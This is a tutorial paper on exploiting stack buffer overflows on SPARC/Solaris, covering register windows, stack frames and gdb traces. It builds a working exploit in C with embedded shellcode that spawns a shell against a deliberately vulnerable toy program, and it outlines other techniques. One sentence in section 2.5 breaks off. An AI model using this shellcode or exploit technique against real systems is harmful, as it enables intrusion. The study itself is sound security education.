" IT'S TOASTED "                             

             Exploiting SPARC Buffer Overflow vulnerabilities             
                          by pr1 <pr1@u-n-f.com>


----/  1 - Introduction

 Sparc is a RISC architecture designed by Sun Microsystems. It is supported by
many operating systems, such as Solaris, Linux, OpenBSD and NetBSD.
As Sun decided to develop Solaris >= 9 for Sparc only, and as there
is not much information on Sparc overflows on the net, I decided to write
this article. There are some major differences in how Sparc handles function
calls, function returns and stack management that are worth knowing.
If you ever asked yourself "Why am I unable to exploit this simple strcpy()
in main() on Sparc?", this paper has the answer.

----/ 2 - Architecture Overview

 There are 32 general purpose registers visible on Sparc at any given time.
8 of them are the "global" registers. They are called %g0 - %g7 and stay
the same across procedure calls. The other 24 registers form a so called
register window. A window consists of 3 types of registers: the "in",
"out" and "local" registers ( 8 of each ).
A Sparc implementation can have from 2 to 32 windows. Because adjacent
windows share 8 registers, each window adds 16 registers, giving
40 - 520 registers in total ( remember that the global registers are static ).
The variable number of registers is the reason Sparc is called scalable.
 At any given time only one window is visible. This window is selected
by the CWP ( current window pointer ), which is a field of the PSR
( processor status register ) in Sparc V8. It is a register of its own in
Sparc V9.
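
 As a quick sanity check of these numbers, here is a minimal sketch in C.
The helper name sparc_total_registers() is made up for this illustration. It
only assumes what was said above: 8 globals plus 16 new registers for every
window, because the 8 "in" registers of a window are shared with its
neighbour.

```c
#include <assert.h>

/* Hypothetical helper, not part of any Sparc toolchain.
 * 8 globals + 16 registers per window ( 8 "local" + 8 "out";
 * the 8 "in" registers are shared with the adjacent window ). */
int sparc_total_registers( int nwindows ) {
        assert( nwindows >= 2 && nwindows <= 32 );
        return 8 + 16 * nwindows;
}
```

 For the smallest and the largest configuration ( 2 and 32 windows ) this
gives 40 and 520 registers.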

 The register windows are primarily used for procedure calls. The concept is
that "in" registers contain incoming arguments, "local" registers can be
used for storing values while the procedure executes and "out" registers
contain outgoing arguments. The "global" registers are used for values that
do not change much between procedure calls.

 The register windows overlap partially. The SAVE operation renames the "out"
registers to become the "in" registers of the called procedure. Because
procedure calls are a quite frequent operation this was meant to improve
performance.
 Actually this was a bad idea, caused by studies that only considered
isolated programs. The drawback is: as soon as the program interacts with
the system ( or runs out of free windows ) the registers have to be stored
on the stack, which results in a lot of slow store and load instructions.
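
 The overlap can be sketched as a toy model in C. Everything here is an
assumption made for illustration: the window count of 8, the slot layout and
all names are invented, and the CWP direction follows Sparc V8 ( SAVE
decrements ). The point is only that the "in" registers of one window are
the very same storage as the "out" registers of the next one.

```c
#define NWINDOWS 8              /* assumed; real CPUs have 2 - 32 */
#define NSLOTS   ( NWINDOWS * 16 )

/* Toy register file: window w owns 16 slots ( 8 out + 8 local ).
 * Its "in" registers are the "out" registers of window w+1. */
struct regfile {
        unsigned long slot[ NSLOTS ];
        int cwp;
};

/* slot index of %oN, %lN and %iN as seen from window w */
int out_idx( int w, int n ) { return ( w * 16 + n ) % NSLOTS; }
int loc_idx( int w, int n ) { return ( w * 16 + 8 + n ) % NSLOTS; }
int in_idx( int w, int n )  { return out_idx( ( w + 1 ) % NWINDOWS, n ); }

/* SAVE: step to the next free window ( V8: CWP - 1, modulo NWINDOWS ) */
void model_save( struct regfile *r ) {
        r->cwp = ( r->cwp + NWINDOWS - 1 ) % NWINDOWS;
}

/* RESTORE: step back to the caller's window ( V8: CWP + 1 ) */
void model_restore( struct regfile *r ) {
        r->cwp = ( r->cwp + 1 ) % NWINDOWS;
}
```

 If the caller writes a value to its %o7 and then calls model_save(), the
callee finds the same value in its %i7 without a single copy being made.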

---/ 2.1 - Sparc Registers

The registers are organized as follows:

%g0 - %g7 ( %r0 - %r7 )  : global registers
%o0 - %o7 ( %r8 - %r15 ) : out registers, they contain arguments for
                           procedure calls
%l0 - %l7 ( %r16 - %r23 ): local registers, use them for local variables
%i0 - %i7 ( %r24 - %r31 ): in registers, after a procedure call these
                           registers contain incoming arguments

Some special registers:

%g0        : always contains zero ( hardwired )
%sp ( %o6 ): the stack pointer, points to the top of the stack frame
             ( the last element pushed onto it )
%o7        : called subroutine's return address
%fp ( %i6 ): the frame pointer, points to the bottom of the stack frame
%i7        : subroutine return address ( return address - eight )
%o0        : return value from called subroutine

---/ 2.2 - The Sparc Pipeline

 The Sparc architecture uses a pipeline to improve performance. A pipeline
lets the CPU complete more instructions in the same time than it could
without one. Usually there are several steps until a CPU finishes the
execution of an instruction. The instruction has to be fetched, decoded and
executed, branches have to be completed ( pc = npc ) and results have to be
written to the destination.
Doing all these things and only then starting over with the next instruction
is a waste of time. Thus a pipeline was implemented: while the CPU decodes
the first instruction it already fetches the next one, and so on.
Using this technique several instructions can be executed almost in
parallel. How these steps are implemented differs from pipeline to pipeline.
The Sparc pipeline has a depth of two. Hence there is a PC and an nPC
( next program counter, pointing to the next instruction to be executed ).
nPC is always copied into PC after the current instruction was executed.

 You might ask yourself what happens if the CPU executes a branch instruction
( jumps somewhere ) and already has the next instruction in the pipeline.
It is unknown at compile time whether this branch will be taken or not.
The already fetched instruction could simply be discarded, but this
would be a performance loss. Thus the Sparc architecture executes the
instruction following the branch instruction before the branch is taken.

e.g.: call subroutine   <- %o0 is already zero when subroutine starts
      xor %o0,%o0,%o0   <- delay slot, executed before the jump happens

This is known as a branch delay slot.
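
 The PC/nPC mechanics can be sketched in a few lines of C. This is a toy
model under simplifying assumptions ( no annul bit, no traps ), and the
struct and function names are invented for this illustration. A taken branch
only redirects nPC, so the instruction that nPC already pointed to, the
delay slot, still runs first.

```c
/* Toy model of the PC/nPC pair; names are illustrative only. */
struct cpu {
        unsigned long pc;       /* instruction being executed */
        unsigned long npc;      /* instruction executed next  */
};

/* Retire the instruction at pc. If it is a taken branch or call to
 * `target`, only nPC is redirected. The instruction nPC pointed to
 * ( the delay slot ) becomes the new PC and is executed first. */
void step( struct cpu *c, int is_branch, unsigned long target ) {
        unsigned long next = is_branch ? target : c->npc + 4;

        c->pc  = c->npc;
        c->npc = next;
}
```

 Starting with pc on a call and npc four bytes behind it, the first step()
moves pc into the delay slot and only the second step() arrives at the
target.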

---/ 2.3 - Instruction size

 x86 instructions differ in their length. Sparc uses a pipeline to
improve performance and the designers found it easier to implement every
instruction as a four byte opcode sequence. But this also means that a
NOP has a length of four bytes as well. Usually this would be a small problem
( consider what happens if we jump into the middle of a NOP ).
Because we have to care about alignment anyway this problem vanishes soon.

---/ 2.4 - Function calls

 The Sparc architecture uses the call/ret instruction pair to implement
procedure calls. RET is a so called synthetic instruction, and so is CALL
when its target is given in a register. The hardware equivalent instruction
( the instruction assembled into the binary ) is a jump ( jmpl ).
A CALL to a label is assembled into a real, PC relative call instruction
that links through %o7 in the same way.
Note "l" stands for link not for long.

The assembler plays a bigger role for execution speed on RISC than on CISC:

	* The assembler reorders instructions into a logically equivalent
	  sequence to prevent different pipeline hazards.
	* It also optimizes branch delay slots by placing useful
	  instructions in them.
	* It expands synthetic instructions ( or even compounds of them )
	  into hardware instructions.

For example:

	* call subroutine == jmpl subroutine,%o7
	  ( remember that %o7 contains the called subroutine's return address )
	* ret == jmpl %i7+8,%g0
	  ( remember that %i7 is ret address - 8, %g0 always
	    contains zero )

 The CALL instruction saves the current value of PC ( its own address ) in
%o7, copies nPC into PC and sets nPC to the address specified in the CALL.
 The RET instruction copies nPC into PC and sets nPC to %i7+8. 8 bytes are
added because the address saved in %i7 is the address of the call
instruction itself. Because all instructions have a size of four bytes and
there is a branch delay slot of four bytes after the call, we have to skip
eight bytes.
%i7 is used instead of %o7 because the SAVE instruction renamed the "out"
registers to "in" registers.
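
 The "+8" rule is simple enough to write down as code. The function name
below is invented for this sketch. The two example values are taken from the
gdb session in section 3.2, where %i7 = 0x10640 leads back to 0x10648 in
main() and %o7 = 0x10614 leads back to 0x1061c in copy().

```c
/* %o7 / %i7 hold the address of the call instruction itself.
 *   ret  ( after a SAVE )   == jmpl %i7+8, %g0
 *   retl ( optimized leaf ) == jmpl %o7+8, %g0
 * +4 skips the call, another +4 skips its delay slot. */
unsigned long return_target( unsigned long saved_call_addr ) {
        return saved_call_addr + 8;
}
```

 Note that return_target( 0x61616161 ) is 0x61616169, which is not a
multiple of four.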

 The next thing a procedure does is reserve some stack space to store
automatic ( local ) variables, compiler temporaries, the pointer to the
return value, ...
This is done with the SAVE and RESTORE instructions.

        The SAVE instruction reserves stack space for the above mentioned
        things. Its syntax is:
                                save %sp, imm(ediate value), %sp.
        SAVE makes the old %sp the new %fp, adds imm to the old %sp and
        stores the result in the new %sp. Because the stack grows down
        imm should be a negative value. The CWP field in the PSR
        register is also decremented ( out registers become in registers ).

        Note that on Sparc V9 the behaviour is a little different. Sparc V9
        has a separate register for CWP. SAVE increments the CWP and RESTORE
        decrements it.

        RESTORE increments the CWP ( Sparc V9 decrements it ).
        In registers become the out registers again. The eight input
        registers and the eight local registers are restored to the values
        they contained before the most recent SAVE instruction. The restore
        instruction then acts like an add instruction, except that the
        source registers are from the old register set and the destination
        register is from the new register set. This makes %fp the new %sp.

A procedure prologue and epilogue thus look like:

	save %sp, -368, %sp
	...
	ret
	restore

Restore is executed one slot later in the pipeline ( it sits in the delay
slot of ret ), but its effects take place before ret changes the %pc.
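
 The pointer arithmetic of SAVE and RESTORE can be modelled like this. It is
only a sketch: struct frame and both function names are invented, and
register renaming is reduced to the two pointers we care about. The example
values come from the gdb session in section 3.2, where main() runs with
%sp = 0xffbef838 and copy() ends up with %fp = 0xffbef838 and
%sp = 0xffbef6c8, which is exactly 368 bytes lower.

```c
struct frame {
        unsigned long sp;
        unsigned long fp;
};

/* save %sp, imm, %sp : the caller's %sp becomes the callee's %fp,
 * the callee's %sp is the caller's %sp plus the ( negative ) imm. */
struct frame model_save_frame( struct frame caller, long imm ) {
        struct frame callee;

        callee.fp = caller.sp;
        callee.sp = caller.sp + imm;
        return callee;
}

/* restore : the callee's %fp is the caller's %sp again. The caller's
 * own %fp comes back with its register window ( saved %i6 ). */
struct frame model_restore_frame( struct frame callee, unsigned long saved_i6 ) {
        struct frame caller;

        caller.sp = callee.fp;
        caller.fp = saved_i6;
        return caller;
}
```

 The second function is where an overflow hurts: saved_i6 is read back
from memory if the caller's window was spilled to the stack.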

---/ 2.5 - Leaf and Optimized Leaf Procedures

 A leaf procedure is a procedure that does not call any other procedures.
A routine that does not allocate a register window of its own by executing
the SAVE instruction is termed an optimized leaf procedure.

 One way to recognize an optimized leaf procedure is by scanning the
assembly code and noting the absence of a SAVE instruction. Optimized leaf
routines do not have a stack frame allocated to them.
They use their caller's stack frame and register window.

 If the routine is an optimized leaf the previous frame's PC should be looked
up in register %o7. Otherwise it needs to be looked up in register %i7, which is
what register %o7 becomes after a SAVE instruction. This is what defines 


---/ 2.6 - The Sparc Stack

                               High Addresses
        %fp ->   cw |  automatic variables                            |
                 cw |  space allocated with alloca()                  |
                 cw |  space for compiler temporaries                 |
                 cl |  outgoing parameters                            |
                 cl |  copies of outgoing parameters                  |
                 cl |  one word ( hidden parameter )                  |
        %sp ->   cl |  64 bytes for possible copy of register window  |
                               Low Addresses

The stack frame consists of 2 parts:

	Current Workspace ( cw ):

	The current workspace is used by C procedures. It consists of
	automatic variables, space allocated by alloca() and space for
	compiler temporaries. When writing an assembly routine you only
	have to reserve space for the temporary values you need.

	Call Linkage ( cl ):

	This space is required to save outgoing registers and the register
	window when control passes to another procedure.
	The Call Linkage is important for exploiting Sparc overflows.

The minimum stack frame size is 96 bytes.
It consists of:

			* 64 bytes for copy of register window
			* 6 * 4 bytes for outgoing parameters
			* 4 bytes for the hidden parameter

 These are only 92 bytes, but the stack and frame pointer
are required to be on an eight byte boundary ( 92 is not divisible by eight ).
Hence the minimum stack frame size is 96 bytes.
 A side effect of rounding up to an eight byte boundary is that there is
always space for at least one temporary variable.
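
 The rounding can be written down as a small C sketch. The macro and
function names are invented for this illustration and the sizes are the ones
listed above for the 32 bit stack frame. Real compilers may reserve more
than this minimum.

```c
#define WINDOW_SAVE_AREA 64     /* 16 registers * 4 bytes    */
#define OUTGOING_ARGS    24     /* 6 * 4 bytes               */
#define HIDDEN_PARAM      4     /* one word                  */

/* round n up to the next multiple of eight */
unsigned long round_up8( unsigned long n ) {
        return ( n + 7 ) & ~7UL;
}

/* smallest legal frame for `extra` bytes of locals/temporaries */
unsigned long frame_size( unsigned long extra ) {
        return round_up8( WINDOW_SAVE_AREA + OUTGOING_ARGS +
                          HIDDEN_PARAM + extra );
}
```

 frame_size( 0 ) and frame_size( 4 ) both give 96: the four padding bytes
are exactly the room for one temporary word mentioned above.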

 The current workspace contains a dynamically allocated area ( alloca() ),
so we can not tell at compile time how large it will be. Hence automatic
variables are accessed via %fp with negative offsets and everything else is
accessed via %sp with positive offsets.

----/ 3 - A demonstration vulnerability

 Not every buffer overflow is exploitable on Sparc. We need at least one
level of function nesting to be able to exploit it.

#include <string.h>

void copy( const char *a ){
	char buf[256];

	strcpy( buf, a );	/* no bounds check: overflows buf */
}

int main( int argc, char *argv[] ) {

	copy( argv[1] );
	return 0;
}


---/ 3.1 - Studying the overflow in theory 

Let us recall what happens on function calls and function returns.

    %i7 contains main()'s return address. It will return into exit()
    in _start to perform cleanup before program termination.

    main() calls copy(). jmpl ( call ) saves the return address back
    into main() in register %o7 and the SAVE instruction in/decrements
    the CWP, renaming %o7 into %i7. %i7 is already filled with
    main()'s return address into exit() though. Thus main()'s register
    window has to be saved on the stack. It ends up at main()'s %sp, which
    is copy()'s %fp, right above copy()'s local variables. %i7 now
    contains copy()'s return address back into main().

    strcpy() follows the same algorithm.
    When strcpy() writes past the end of buf it overwrites the upper part
    of copy()'s stack frame and the register window saved above it.
    strcpy()'s stack frame and its stored return address back into copy()
    are still intact and strcpy() returns back into copy(). All register
    contents are still intact but the stack above buf is damaged. copy()
    finally restores and jumps back to main(). But main()'s register
    window was saved right above copy()'s stack frame and was damaged by
    our overflowing strcpy(). When returning back into main() the
    saved/damaged register window is restored. The input and local registers
    now contain user supplied data. When main() returns it would usually jump
    into exit() in _start to perform cleanup, but as we changed the return
    address it jumps into nowhere ( 0x61616161 + 8 ) and dies with a SIGBUS
    error.

---/ 3.2 - Studying the overflow with gdb

 Let us feed this into gdb and see what happens. Note that I have removed
redundant information, like static registers that are not saved in the
register windows, to shorten the output and to make the overflow
clearer.

These are our registers in main() before copy() is called.

(gdb) info register
sp             0xffbef838	
o7             0x106c0	
l0             0xc	
l1             0xff3400a4	
l2             0xff33c5d8	
l3             0x0	
l4             0x0	
l5             0x0	
l6             0x0	
l7             0xff3e6694	
i0             0x2	
i1             0xffbef90c	
i2             0xffbef918	
i3             0x20870	
i4             0x0	
i5             0x0	
fp             0xffbef8a8	
i7             0x104c8	

This is our stack frame before copy() is called.
That is our saved register window. Note the saved PC at 0xffbef874.
(gdb) x/96x $sp
%sp -> 0xffbef838: 0x0000000c 0xff3400a4 0xff33c5d8 0x00000000  [%l0 - %l3]       
       0xffbef848: 0x00000000 0x00000000 0x00000000 0xff3e6694  [%l4 - %l7]
       0xffbef858: 0x00000002 0xffbef90c 0xffbef918 0x00020870  [%i0 - %i3]
       0xffbef868: 0x00000000 0x00000000 0xffbef8a8 0x000104c8  [%i4 - %i7]
            .           .          .          .         .
            .           .          .          .         . 
            .           .          .          .         .
%fp -> 0xffbef9a8: 0x00000003 0x00010034 0x00000004 0x00000020     

Breakpoint 5, 0x10610 in copy ()

Register values in copy() before the call to strcpy().

(gdb) info register
sp             0xffbef6c8	
o7             0x0			
l0             0x0	
l1             0x0	
l2             0x0	
l3             0x0	
l4             0x0	
l5             0x0	
l6             0x0	
l7             0x0	
i0             0xffbefa37	
i1             0xffbef910	
i2             0xffbef90c	
i3             0x300	
i4             0x2371c	
i5             0xff29bbc0	
fp             0xffbef838	
i7             0x10640	

 And the stack frame before the strcpy() call. Note how the saved register
window ( of main() ) now lies "below" our input buffer in the dump, i.e. at
higher addresses.
 The first 64 bytes are the register window of copy(). We will not be able
to overwrite the PC at 0xffbef704 because it is "above" our input buffer
( at a lower address ). This PC contains the return address back to main().

(gdb) x/96x $sp

%sp -> 0xffbef6c8: 0x00000000 0x00000000 0x00000000 0x00000000  
       0xffbef6d8: 0x00000000 0x00000000 0x00000000 0x00000000
       0xffbef6e8: 0xffbefa37 0xffbef910 0xffbef90c 0x00000300
       0xffbef6f8: 0x0002371c 0xff29bbc0 0xffbef838 0x00010640  [saved PC]
            .           .          .          .          .
            .           .          .          .          .
            .           .          .          .          .
buf -> 0xffbef728: 0x00000000 0x00000000 0x00000000 0x00000000
       0xffbef738: 0x00000000 0x00000000 0x00000000 0x00000000
       0xffbef748: 0x00000000 0x00000000 0x00000000 0x00000000
            .           .          .          .          .
            .           .          .          .          .
            .           .          .          .          .
%fp -> 0xffbef838: 0x0000000c 0xff3400a4 0xff33c5d8 0x00000000
       0xffbef848: 0x00000000 0x00000000 0x00000000 0xff3e6694
       0xffbef858: 0x00000002 0xffbef90c 0xffbef918 0x00020870
       0xffbef868: 0x00000000 0x00000000 0xffbef8a8 0x000104c8 <- PC
                                          ( PC to exit() in _start )

Breakpoint 6, 0x1061c in copy ()

Register values after strcpy() overflowed the buffer.

(gdb) info register
sp             0xffbef6c8	
o7             0x10614	
l0             0x0	
l1             0x0	
l2             0x0	
l3             0x0	
l4             0x0	
l5             0x0	
l6             0x0	
l7             0x0	
i0             0xffbefa37	
i1             0xffbef910	
i2             0xffbef90c	
i3             0x300	
i4             0x2371c	
i5             0xff29bbc0	
fp             0xffbef838	
i7             0x10640	

And the corrupted stack frame.
(gdb) x/96x $sp
      0xffbef6c8: 0x00000000 0x00000000 0x00000000 0x00000000
      0xffbef6d8: 0x00000000 0x00000000 0x00000000 0x00000000
      0xffbef6e8: 0xffbefa37 0xffbef910 0xffbef90c 0x00000300
      0xffbef6f8: 0x0002371c 0xff29bbc0 0xffbef838 0x00010640* 
          .            .        [ *  PC to main still intact ]
          .            .          .          .          .
          .            .          .          .          .
          .            .          .          .          .
buf-> 0xffbef728: 0x61616161 0x61616161 0x61616161 0x61616161
      0xffbef738: 0x61616161 0x61616161 0x61616161 0x61616161
      0xffbef748: 0x61616161 0x61616161 0x61616161 0x61616161
      0xffbef758: 0x61616161 0x61616161 0x61616161 0x61616161
         .             .          .          .          .
         .             .          .          .          .
         .             .          .          .          .
      0xffbef868: 0x61616161 0x61616161 0x61616161 0x61616161* 
                                        [* PC to exit damaged ]

 Very nice. We were able to alter main()'s saved PC into exit().
After copy() restores, the in and local registers are set to the
"saved/damaged" values. As we altered these values by overflowing
the input buffer, the in and local registers contain our supplied values.

Breakpoint 7, 0x10648 in main ()
(gdb) info register
sp             0xffbef838	
o7             0x10640	   
l0             0x61616161	
l1             0x61616161	
l2             0x61616161	
l3             0x61616161	
l4             0x61616161	
l5             0x61616161	
l6             0x61616161	
l7             0x61616161	
i0             0x61616161	
i1             0x61616161	
i2             0x61616161	
i3             0x61616161	
i4             0x61616161	
i5             0x61616161	
fp             0x61616161	
i7             0x61616161   <- next ret will jump here+8

main() is now about to clean up and jump into exit(). But as we altered its
saved PC it will jump to 0x61616161+8 and die.
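
 The distances seen in the dumps can be recomputed with a little C. The
function names are invented for this sketch. It assumes the layout of the
64 byte window save area used throughout this paper: %l0 - %l7 first, then
%i0 - %i7, four bytes each. The addresses are the ones from the gdb session
above ( buf at 0xffbef728, copy()'s %fp at 0xffbef838 ).

```c
/* byte offset of a register inside a 64 byte window save area */
unsigned long local_slot( int n ) { return 4UL * n; }
unsigned long in_slot( int n )    { return 32 + 4UL * n; }

/* Distance from the start of a buffer in the callee to a slot of
 * the caller's saved window, which starts at the callee's %fp. */
unsigned long slot_distance( unsigned long buf,
                             unsigned long callee_fp,
                             unsigned long slot ) {
        return callee_fp + slot - buf;
}
```

 With the values from above the saved %l0 lies 272 bytes behind the start
of buf, the saved %i6 ( %fp ) 328 bytes and the saved %i7 332 bytes.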

----/ 4 - Building an exploit	  

 In this section we will build an exploit for the vulnerability we just
studied. We also list some differences between x86 and Sparc exploitation
and cover alignment issues.

---/ 4.1 - Differences between x86 and Sparc exploitation

* memory access:

    On x86, as on most CISC processors, we can write to unaligned memory
    addresses without the CPU complaining. Sometimes we only have to
    adjust the alignment. Not so on Sparc. See more about alignment at 4.2.
    Note that tolerating unaligned memory accesses is a CPU feature of
    the x86 family. It will complain if the AC ( alignment check ) flag
    is set in the flags register.

* call/ret internals:

    Because of the internal workings of the Sparc stack frames and call/ret
    pairs we need at least one level of function nesting to be able to
    exploit a buffer overflow vulnerability on Sparc.

* finding the stack base address:

    Sparc Solaris uses a different stack base address on different
    machine architectures:

        - sun4u: 0xffbe....,
        - sun4m: 0xefff....,
        - sun4d: 0xdfff....

    We can get a stack address to start from with the following
    assembler snippet:

        unsigned long get_sp( void ) {
                /* copy %sp into %i0, which becomes the return value */
                __asm__(" or %sp, %sp, %i0 " );
        }

* size of overflow:

    On a Sparc we usually have to be able to write more than just a
    few bytes beyond the target buffer. This is because we have to overwrite
    at least %l0 - %l7 and %i0 - %i6 before reaching the saved return address.

* overwriting an address with one byte:

    Overflowing an address with one byte on x86 lets us control
    the least significant byte. Chances are good that we can
    alter some stack address a little bit to point into our shellcode.
    As Sparc is a big endian architecture an overflow reaches the most
    significant byte of an address first. Thus we can alter only the most
    significant byte with a one byte overflow. This decreases
    our chances of providing some useful address.
    See [3] for more details on one byte overflows.
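
 The endianness argument from the last point can be checked with a small,
portable C sketch. All names are invented for this illustration. The code
lays out a 32 bit value in memory byte by byte, overwrites the byte at the
lowest address ( the one a one byte overflow reaches ) and reads the value
back.

```c
#include <stdint.h>

/* store a 32 bit value the way the CPU would lay it out in memory */
void store32( uint8_t mem[4], uint32_t v, int big_endian ) {
        int i;

        for( i = 0; i < 4; i++ ) {
                int shift = big_endian ? 24 - 8 * i : 8 * i;
                mem[i] = ( v >> shift ) & 0xff;
        }
}

/* read it back using the same byte order */
uint32_t load32( const uint8_t mem[4], int big_endian ) {
        uint32_t v = 0;
        int i;

        for( i = 0; i < 4; i++ ) {
                int shift = big_endian ? 24 - 8 * i : 8 * i;
                v |= (uint32_t)mem[i] << shift;
        }
        return v;
}

/* a one byte overflow hits mem[0], the lowest address of the word */
uint32_t off_by_one( uint32_t saved, uint8_t byte, int big_endian ) {
        uint8_t mem[4];

        store32( mem, saved, big_endian );
        mem[0] = byte;
        return load32( mem, big_endian );
}
```

 On a little endian layout 0xbffff838 turns into 0xbffff800, still a nearby
stack address. On a big endian layout 0xffbef838 turns into 0x00bef838,
which points somewhere completely different.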

---/ 4.2 - Alignment

 Like most other RISC processors Sparc does not allow unaligned memory
accesses. This means we must not read a word from, write a word to or jump
to any address that is not on a 4 byte boundary. Otherwise the CPU generates
a Bus Error exception and our program dies. Also consider what would happen
if we jumped into the middle of one of our NOPs. Remember that every
Sparc instruction is 4 bytes long. It is very probable that the processor
would generate an Illegal Instruction exception and our program would crash
as well.

 That is why we have to take care that our exploit return address is a
multiple of 4, our shellcode lies at a 4 byte boundary in our attack
buffer and the length of our attack buffer itself is a multiple of 4.
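
 Both checks are one-liners in C. The helper names are invented for this
sketch. Masking with ~3UL clears the two lowest bits, which is the same as
rounding down to the next multiple of four.

```c
/* 1 if addr lies on a 4 byte boundary, 0 otherwise */
int is_aligned4( unsigned long addr ) {
        return ( addr & 3UL ) == 0;
}

/* round addr down to the next 4 byte boundary */
unsigned long align_down4( unsigned long addr ) {
        return addr & ~3UL;
}
```

 For example 0xffbef838 is aligned, while 0x61616169 ( our "aaaa" plus
eight ) is not.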

---/ 4.3 - Exploiting the vulnerability

 Note that we take care to write only to aligned memory addresses.
If we put our shellcode at some unaligned address in our attack buffer
we will never be able to reach it. The same goes for the nops. With
unaligned nops we land in the middle of a nop every time we reach them.
This results in an Illegal Instruction exception and our program dies
without executing our code.

We also have to set %fp to a "safe" address or the retl instruction will
crash. A "safe" address simply is some stack address. We could also use
our return address to overwrite %fp.

/* Exploits toy vulnerability on Sparc/Solaris
 * pr1
 * June 2002
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <strings.h>
#include <unistd.h>

/* lsd - Solaris shellcode */
static char shell[]=         /* 10*4+8 bytes */

        "\x20\xbf\xff\xff"   /* bn,a  */
        "\x20\xbf\xff\xff"   /* bn,a  */
        "\x7f\xff\xff\xff"   /* call  */
        "\x90\x03\xe0\x20"   /* add %o7,32,%o0 */
        "\x92\x02\x20\x10"   /* add %o0,16,%o1 */
        "\xc0\x22\x20\x08"   /* st %g0,[%o0+8] */
        "\xd0\x22\x20\x10"   /* st %o0,[%o0+16] */
        "\xc0\x22\x20\x14"   /* st %g0,[%o0+20] */
        "\x82\x10\x20\x0b"   /* mov 0x0b,%g1 */
        "\x91\xd0\x20\x08"   /* ta 8 */
        "/bin/ksh" ;

#define BUFSIZE 336

static char np[] = "\xac\x15\xa1\x6e";  /* 4 bytes, used as nop */

unsigned long get_sp( void ) {
        /* copy %sp into %i0, which becomes the return value */
        __asm__("or %sp,%sp,%i0");
}

int main( int argc, char *argv[] ) {

        char buf[ BUFSIZE ],*ptr;
        unsigned long ret,sp;
        int rem,i,err;

        ret = sp = get_sp();

        /* optional offset ( hex ) to subtract from the stack pointer */
        if( argv[1] ) {
                ret -= strtoul( argv[1], (void *)0, 16 );
        }

        /* align return address */
        if( ( rem = ret % 4 ) ) {
                ret &= ~(rem);
        }

        /* fill the buffer with nops, 4 bytes at a time; memcpy() is
         * used so that no terminating 0 is written behind buf */
        bzero( buf, BUFSIZE );
        for( i = 0; i < BUFSIZE; i+=4 ) {
                memcpy( &buf[i], np, 4 );
        }

        memcpy( (buf + BUFSIZE - strlen( shell ) - 8),shell,strlen( shell ));

        ptr = &buf[328];
        /* set fp to a safe stack value */
        *( ptr++ ) = ( sp >> 24 ) & 0xff;
        *( ptr++ ) = ( sp >> 16 ) & 0xff;
        *( ptr++ ) = ( sp >> 8 ) & 0xff;
        *( ptr++ ) = ( sp ) & 0xff;

        /* we now overwrite saved PC */
        *( ptr++ ) = ( ret >> 24 ) & 0xff;
        *( ptr++ ) = ( ret >> 16 ) & 0xff;
        *( ptr++ ) = ( ret >> 8 ) & 0xff;
        *( ptr++ ) = ( ret ) & 0xff;
        buf[ BUFSIZE -1 ] = 0;

#ifndef QUIET
        printf("Return Address 0x%lx\n",ret);
#endif
        err = execl( "./vul", "vul", buf, ( void *)0 );
        if( err == -1 ) perror("execl");
        return 1;
}


----/ 5 - Alternative ways of exploitation

 As we saw, very small overruns are not as likely to be exploitable on
Sparc as they are on other platforms. But let us consider some
special cases where you are able to overwrite other sensitive
information on the stack.

 An example is overwriting a program's function pointer or jmp_buf with
the address of system() and telling it to execute /bin/sh.
See [4] for more information about overwriting such structures.

 On Sparc the text segment is mapped to small addresses.
If we try to overwrite such a function pointer/jmp_buf with the address of
some other function, we can not write this small address without any 0x00
bytes. This is because on Sparc the address is written from most to least
significant byte, so the leading 0x00 bytes come first and end the copy.
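
 Whether an address survives a str*() style copy can be tested up front. The
following C sketch uses invented function names and assumes 32 bit addresses
written in big endian order, as described above. The example values are
taken from the gdb session in section 3.2: 0x000104c8 is a text address,
0xffbef728 is the address of buf on the stack.

```c
#include <stdint.h>

/* 1 if any of the four bytes of addr is 0x00 */
int has_nul_byte( uint32_t addr ) {
        int i;

        for( i = 0; i < 4; i++ ) {
                if( ( ( addr >> ( 8 * i ) ) & 0xff ) == 0 )
                        return 1;
        }
        return 0;
}

/* Number of address bytes a str*() copy delivers on a big endian
 * machine: bytes go out most significant first and the copy stops
 * at the first 0x00. */
int bytes_before_nul( uint32_t addr ) {
        int n = 0;

        while( n < 4 && ( ( addr >> ( 24 - 8 * n ) ) & 0xff ) != 0 )
                n++;
        return n;
}
```

 For the text address not a single byte gets through, for the stack
address all four do.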

 An alternative way is placing shellcode onto the stack and overwriting
the function pointer with the shellcode's stack address, whose eight
hex digits normally contain no 0x00 byte.

 Because of alignment restrictions on Sparc we can't exploit format
string vulnerabilities by writing one byte four times with the "%n"
directive. By using the short qualifier ( "%hn" ) the alignment is emulated
either in software or special machine instructions are used, and you can
usually write on every two byte boundary. See [6] for more information.

 The return into libc technique can also be applied on Solaris/Sparc to
defeat non executable stack patches. See [7] for more information.

 Dynamic heap overflows via corruption of malloc internal structures
are exploitable on Sparc as well.
See [8] and [9] for a glibc and the SysV malloc implementation and
exploitation discussion.

----/ 6 - Conclusion

 We need a bit more luck to be able to exploit Sparc buffer overflows
than their brothers/sisters on x86. In general it is not enough to be
able to overwrite just a few bytes beyond the buffer. Additionally we saw
that the way the stack is handled has a great influence on the
exploitability of buffer overrun vulnerabilities. This class of
vulnerabilities can not always be exploited on Sparc as there must exist at
least one level of subroutine call nesting, so that two consecutive
ret/restore pairs are executed by a vulnerable program after its stack got
overrun.

----/ 7 - References

 [1] UNF - United Net Frontier
 [2] Sun Microsystems
      Sparc Assembly Language Reference Manual
 [3] Klog
      Frame pointer overwriting
 [4] Matt Conover aka. Shok
      w00w00 on Heap Overflows
 [5] some interesting pdfs about computer architectures
 [6] Scut
      Exploiting Format String vulnerabilities
 [7] Horizon
      Return into libc exploits on Sparc/Solaris
 [8] Maxx
      Exploiting dynamic heap overflows via malloc chunk corruption.
 [9] Exploiting dynamic heap overflows via malloc chunk corruption.

----/ 8 - Greetings

	- Big thx to Scut for reviewing the paper
	- Svoern for mental support 
	- all the other UNF fellows